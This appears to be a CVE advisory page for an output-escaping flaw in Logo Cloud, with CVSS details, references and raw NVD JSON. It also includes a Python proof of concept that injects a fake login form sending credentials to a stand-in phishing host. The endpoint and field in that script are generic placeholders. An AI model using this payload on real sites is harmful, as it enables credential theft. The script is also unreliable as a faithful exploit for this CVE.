CVE-2025-0607

Description

Improper Encoding or Escaping of Output vulnerability in Logo Software Inc. Logo Cloud allows Phishing.This issue affects Logo Cloud: before 2.57.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Logo Cloud < 2.57

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-0607 PoC - Logo Cloud Output Encoding/Phishing
# Vulnerability: Improper Encoding or Escaping of Output
# Attack Vector: Inject malicious HTML/JS payload via unescaped output fields

import requests

TARGET_URL = "https://target-logo-cloud-instance.com/api/vulnerable_endpoint"
SESSION_COOKIES = {"session": "attacker_session_token"}  # Requires high privilege (PR:H)

# Malicious payload - phishing form injected via unescaped output
PHISHING_PAYLOAD = {
    "field_name": "</div><form action='https://evil-phishing-site.com/steal' method='POST'>"
                  "<h3>Session Expired - Please Re-login</h3>"
                  "<input type='text' name='username' placeholder='Username'>"
                  "<input type='password' name='password' placeholder='Password'>"
                  "<button type='submit'>Login</button></form><div>"
}

def exploit():
    """
    Step 1: Attacker with high privilege (PR:H) injects payload
    Step 2: Legitimate user (UI:R) visits the affected page
    Step 3: Unescaped output renders phishing form in victim's browser
    Step 4: Victim credentials are sent to attacker's server
    """
    # Inject the malicious payload into the vulnerable field
    response = requests.post(TARGET_URL, data=PHISHING_PAYLOAD, cookies=SESSION_COOKIES)
    
    if response.status_code == 200:
        print("[+] Payload injected successfully")
        print("[+] Awaiting victim interaction (UI:R required)...")
        # When victim visits the page, phishing form will be rendered
        # due to improper output encoding, stealing their credentials
    else:
        print(f"[-] Injection failed: {response.status_code}")

exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-0607
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-0607
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-0607/
[4] VulDB https://vuldb.com/cve/CVE-2025-0607
[5] https://www.usom.gov.tr/bildirim/tr-25-0318

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-0607", "sourceIdentifier": "[email protected]", "published": "2025-10-06T10:15:32.523", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Encoding or Escaping of Output vulnerability in Logo Software Inc. Logo Cloud allows Phishing.This issue affects Logo Cloud: before 2.57."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-116"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0318", "source": "[email protected]"}]}}